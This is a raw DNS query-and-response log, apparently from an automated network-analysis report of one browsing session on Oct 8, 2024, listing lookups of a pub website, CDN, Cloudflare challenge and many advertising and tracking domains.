                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:39.985676050 CEST192.168.2.41.1.1.10x62d1Standard query (0)events-ssc.33across.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:39.985893965 CEST192.168.2.41.1.1.10x5f4bStandard query (0)events-ssc.33across.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:41.412858009 CEST192.168.2.41.1.1.10xdae8Standard query (0)token.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:41.413204908 CEST192.168.2.41.1.1.10x4eb1Standard query (0)token.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:42.498585939 CEST192.168.2.41.1.1.10xe9d9Standard query (0)pixel-us-east.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:42.498744011 CEST192.168.2.41.1.1.10xbc67Standard query (0)pixel-us-east.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:43.609122038 CEST192.168.2.41.1.1.10x7f01Standard query (0)htlb.casalemedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:43.609435081 CEST192.168.2.41.1.1.10x164aStandard query (0)htlb.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:44.318207026 CEST192.168.2.41.1.1.10xa486Standard query (0)prebid.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:44.318694115 CEST192.168.2.41.1.1.10x5968Standard query (0)prebid.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:46.857815981 CEST192.168.2.41.1.1.10x2939Standard query (0)s.yimg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:46.857815981 CEST192.168.2.41.1.1.10x9840Standard query (0)s.yimg.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:47.981949091 CEST192.168.2.41.1.1.10x1a39Standard query (0)securepubads.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:47.982332945 CEST192.168.2.41.1.1.10xd84aStandard query (0)securepubads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:48.408250093 CEST192.168.2.41.1.1.10xf472Standard query (0)ox-rtb-europe-west1.openx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:48.408365965 CEST192.168.2.41.1.1.10x6fb1Standard query (0)ox-rtb-europe-west1.openx.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:48.478662968 CEST192.168.2.41.1.1.10x491bStandard query (0)s.yimg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:48.478915930 CEST192.168.2.41.1.1.10xd6baStandard query (0)s.yimg.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:49.254928112 CEST192.168.2.41.1.1.10x2d3dStandard query (0)ox-rtb-europe-west1.openx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:49.255091906 CEST192.168.2.41.1.1.10xb60Standard query (0)ox-rtb-europe-west1.openx.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:49.529556036 CEST192.168.2.41.1.1.10xb7bcStandard query (0)cs.lkqd.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:49.529752016 CEST192.168.2.41.1.1.10x209aStandard query (0)cs.lkqd.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:49.540399075 CEST192.168.2.41.1.1.10x66f6Standard query (0)cs.lkqd.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:50.515425920 CEST192.168.2.41.1.1.10xc743Standard query (0)cs.lkqd.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:50.515542030 CEST192.168.2.41.1.1.10xafebStandard query (0)cs.lkqd.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:50.540492058 CEST192.168.2.41.1.1.10x8946Standard query (0)i.liadm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:50.540620089 CEST192.168.2.41.1.1.10xdab6Standard query (0)i.liadm.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:50.541680098 CEST192.168.2.41.1.1.10x3c66Standard query (0)aa.agkn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:50.541795015 CEST192.168.2.41.1.1.10x46e3Standard query (0)aa.agkn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:50.544009924 CEST192.168.2.41.1.1.10x6a1dStandard query (0)stags.bluekai.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:50.544353962 CEST192.168.2.41.1.1.10xe07eStandard query (0)stags.bluekai.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:50.999875069 CEST192.168.2.41.1.1.10x29b0Standard query (0)ad.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:51.000518084 CEST192.168.2.41.1.1.10xa01Standard query (0)ad.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:52.341758013 CEST192.168.2.41.1.1.10x6636Standard query (0)odr.mookie1.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:52.341758013 CEST192.168.2.41.1.1.10x7621Standard query (0)odr.mookie1.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:52.344924927 CEST192.168.2.41.1.1.10xb044Standard query (0)aa.agkn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:52.344924927 CEST192.168.2.41.1.1.10xb0bbStandard query (0)aa.agkn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:52.431389093 CEST192.168.2.41.1.1.10x11d4Standard query (0)thrtle.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:52.431726933 CEST192.168.2.41.1.1.10x600fStandard query (0)thrtle.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:52.749248981 CEST192.168.2.41.1.1.10x4475Standard query (0)pixel.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:52.749418974 CEST192.168.2.41.1.1.10x993aStandard query (0)pixel.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:53.056386948 CEST192.168.2.41.1.1.10xb06eStandard query (0)odr.mookie1.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:53.056583881 CEST192.168.2.41.1.1.10xa2acStandard query (0)odr.mookie1.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:57.475018024 CEST192.168.2.41.1.1.10x6897Standard query (0)thrtl.redinuid.imrworldwide.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:57.475224972 CEST192.168.2.41.1.1.10x56d9Standard query (0)thrtl.redinuid.imrworldwide.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:58.614487886 CEST192.168.2.41.1.1.10xf50fStandard query (0)nlsn.thrtle.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:15:58.614861965 CEST192.168.2.41.1.1.10x8038Standard query (0)nlsn.thrtle.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:05.793941021 CEST192.168.2.41.1.1.10x43a6Standard query (0)a3552.casalemedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:05.794569969 CEST192.168.2.41.1.1.10x3fa1Standard query (0)a3552.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:06.607388973 CEST192.168.2.41.1.1.10x3536Standard query (0)a3552.casalemedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:06.607542992 CEST192.168.2.41.1.1.10x22b3Standard query (0)a3552.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:07.366163969 CEST192.168.2.41.1.1.10x8faeStandard query (0)s0.2mdn.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:07.366534948 CEST192.168.2.41.1.1.10xf213Standard query (0)s0.2mdn.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:07.553872108 CEST192.168.2.41.1.1.10x4429Standard query (0)x.bidswitch.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:07.554189920 CEST192.168.2.41.1.1.10x7f62Standard query (0)x.bidswitch.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:07.555188894 CEST192.168.2.41.1.1.10x3e0aStandard query (0)image6.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:07.555484056 CEST192.168.2.41.1.1.10xf61fStandard query (0)image6.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.249351978 CEST192.168.2.41.1.1.10x8532Standard query (0)secure.adnxs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.249491930 CEST192.168.2.41.1.1.10x52c9Standard query (0)secure.adnxs.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.250375986 CEST192.168.2.41.1.1.10xb1edStandard query (0)cms.quantserve.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.250616074 CEST192.168.2.41.1.1.10x6237Standard query (0)cms.quantserve.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.253031969 CEST192.168.2.41.1.1.10xf508Standard query (0)casale-match.dotomi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.253211021 CEST192.168.2.41.1.1.10xb7a4Standard query (0)casale-match.dotomi.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.256339073 CEST192.168.2.41.1.1.10x498eStandard query (0)ads.creative-serving.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.256473064 CEST192.168.2.41.1.1.10xded1Standard query (0)ads.creative-serving.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.402218103 CEST192.168.2.41.1.1.10x1792Standard query (0)ad.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.402436972 CEST192.168.2.41.1.1.10xe820Standard query (0)ad.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.881006956 CEST192.168.2.41.1.1.10xe696Standard query (0)d.turn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.881206989 CEST192.168.2.41.1.1.10x3765Standard query (0)d.turn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.959739923 CEST192.168.2.41.1.1.10x329bStandard query (0)js-sec.indexww.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.959984064 CEST192.168.2.41.1.1.10xb22fStandard query (0)js-sec.indexww.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.995229006 CEST192.168.2.41.1.1.10x3700Standard query (0)dsum-sec.casalemedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:08.995371103 CEST192.168.2.41.1.1.10xa42eStandard query (0)dsum-sec.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:09.666008949 CEST192.168.2.41.1.1.10x6a59Standard query (0)dsum-sec.casalemedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:09.666258097 CEST192.168.2.41.1.1.10x9cf0Standard query (0)dsum-sec.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:09.720462084 CEST192.168.2.41.1.1.10x5372Standard query (0)s0.2mdn.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:09.721033096 CEST192.168.2.41.1.1.10x38ceStandard query (0)s0.2mdn.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:10.032718897 CEST192.168.2.41.1.1.10x7516Standard query (0)dsum.casalemedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:10.032846928 CEST192.168.2.41.1.1.10x3f2Standard query (0)dsum.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:10.580164909 CEST192.168.2.41.1.1.10xbcdaStandard query (0)live.rezync.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:10.580600023 CEST192.168.2.41.1.1.10xc6c5Standard query (0)live.rezync.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:10.696746111 CEST192.168.2.41.1.1.10xa6eStandard query (0)dsum.casalemedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:10.697256088 CEST192.168.2.41.1.1.10xc8b8Standard query (0)dsum.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:11.707334995 CEST192.168.2.41.1.1.10xf96cStandard query (0)ad.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:11.707737923 CEST192.168.2.41.1.1.10x68f4Standard query (0)ad.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:12.317409039 CEST192.168.2.41.1.1.10x3b27Standard query (0)gcdn.2mdn.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:12.317560911 CEST192.168.2.41.1.1.10x946eStandard query (0)gcdn.2mdn.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:13.321770906 CEST192.168.2.41.1.1.10x8c75Standard query (0)r1---sn-ab5sznzs.c.2mdn.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:13.321916103 CEST192.168.2.41.1.1.10x7473Standard query (0)r1---sn-ab5sznzs.c.2mdn.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:15.248425007 CEST192.168.2.41.1.1.10x63cfStandard query (0)pippio.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:15.248970032 CEST192.168.2.41.1.1.10x3ab3Standard query (0)pippio.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:21.359002113 CEST192.168.2.41.1.1.10x6da1Standard query (0)navvy.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:21.359612942 CEST192.168.2.41.1.1.10xf234Standard query (0)navvy.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:21.393709898 CEST192.168.2.41.1.1.10xd939Standard query (0)warp.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:21.394093990 CEST192.168.2.41.1.1.10xb656Standard query (0)warp.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:22.298897028 CEST192.168.2.41.1.1.10x946aStandard query (0)lg3.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:22.299653053 CEST192.168.2.41.1.1.10x23edStandard query (0)lg3.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:22.301879883 CEST192.168.2.41.1.1.10x8857Standard query (0)hblg.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:22.303188086 CEST192.168.2.41.1.1.10xd703Standard query (0)hblg.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:22.618056059 CEST192.168.2.41.1.1.10xe1ffStandard query (0)c21lg-d.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:22.618530035 CEST192.168.2.41.1.1.10x5e2dStandard query (0)c21lg-d.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:22.626343966 CEST192.168.2.41.1.1.10x188bStandard query (0)qsearch-a.akamaihd.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:22.626658916 CEST192.168.2.41.1.1.10xbaf7Standard query (0)qsearch-a.akamaihd.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:23.062860966 CEST192.168.2.41.1.1.10x308cStandard query (0)warp.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:23.063102961 CEST192.168.2.41.1.1.10x9118Standard query (0)warp.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:23.303292990 CEST192.168.2.41.1.1.10x2cfeStandard query (0)lg3.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:23.303560019 CEST192.168.2.41.1.1.10x369aStandard query (0)lg3.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:23.312655926 CEST192.168.2.41.1.1.10x37c5Standard query (0)hblg.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:23.312995911 CEST192.168.2.41.1.1.10x28f0Standard query (0)hblg.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:23.602787971 CEST192.168.2.41.1.1.10x73c5Standard query (0)qsearch-a.akamaihd.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:23.602996111 CEST192.168.2.41.1.1.10xbc8cStandard query (0)qsearch-a.akamaihd.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:23.683933973 CEST192.168.2.41.1.1.10x4969Standard query (0)c21lg-d.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:16:23.684355021 CEST192.168.2.41.1.1.10x5396Standard query (0)c21lg-d.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:12:59.869719028 CEST1.1.1.1192.168.2.40x9719No error (0)mollysirishpub-tol.com69.49.245.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:00.575479984 CEST1.1.1.1192.168.2.40xd8e8No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:00.575479984 CEST1.1.1.1192.168.2.40xd8e8No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:00.575875998 CEST1.1.1.1192.168.2.40xf810No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:00.583718061 CEST1.1.1.1192.168.2.40x6e84No error (0)mollysirishpub-tol.com69.49.245.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:01.532869101 CEST1.1.1.1192.168.2.40xdfbbNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:01.532869101 CEST1.1.1.1192.168.2.40xdfbbNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:01.533051968 CEST1.1.1.1192.168.2.40x38f5No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:01.718883038 CEST1.1.1.1192.168.2.40x14a3No error (0)ortkn.lovationyme.com172.67.220.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:01.718883038 CEST1.1.1.1192.168.2.40x14a3No error (0)ortkn.lovationyme.com104.21.62.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:01.718978882 CEST1.1.1.1192.168.2.40x8853No error (0)ortkn.lovationyme.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:03.527964115 CEST1.1.1.1192.168.2.40xa6a9No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:03.527964115 CEST1.1.1.1192.168.2.40xa6a9No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:03.527964115 CEST1.1.1.1192.168.2.40xa6a9No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:03.527964115 CEST1.1.1.1192.168.2.40xa6a9No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:03.529680967 CEST1.1.1.1192.168.2.40x4b93No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:03.529680967 CEST1.1.1.1192.168.2.40x4b93No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:03.530195951 CEST1.1.1.1192.168.2.40x92c8No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:03.531903028 CEST1.1.1.1192.168.2.40x4a06No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:03.531903028 CEST1.1.1.1192.168.2.40x4a06No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:03.532435894 CEST1.1.1.1192.168.2.40x8e56No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:03.671479940 CEST1.1.1.1192.168.2.40x1616No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:03.676593065 CEST1.1.1.1192.168.2.40x7cccNo error (0)www.google.com142.250.186.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:06.085956097 CEST1.1.1.1192.168.2.40x5994No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:06.086139917 CEST1.1.1.1192.168.2.40xec39No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:06.086139917 CEST1.1.1.1192.168.2.40xec39No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:06.093441010 CEST1.1.1.1192.168.2.40xfe78No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:06.093441010 CEST1.1.1.1192.168.2.40xfe78No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:06.093441010 CEST1.1.1.1192.168.2.40xfe78No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:06.093441010 CEST1.1.1.1192.168.2.40xfe78No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:06.112163067 CEST1.1.1.1192.168.2.40x20ffNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:06.112163067 CEST1.1.1.1192.168.2.40x20ffNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:06.112179041 CEST1.1.1.1192.168.2.40xa432No error (0)challenges.cloudflare.com65IN (0x0001)false
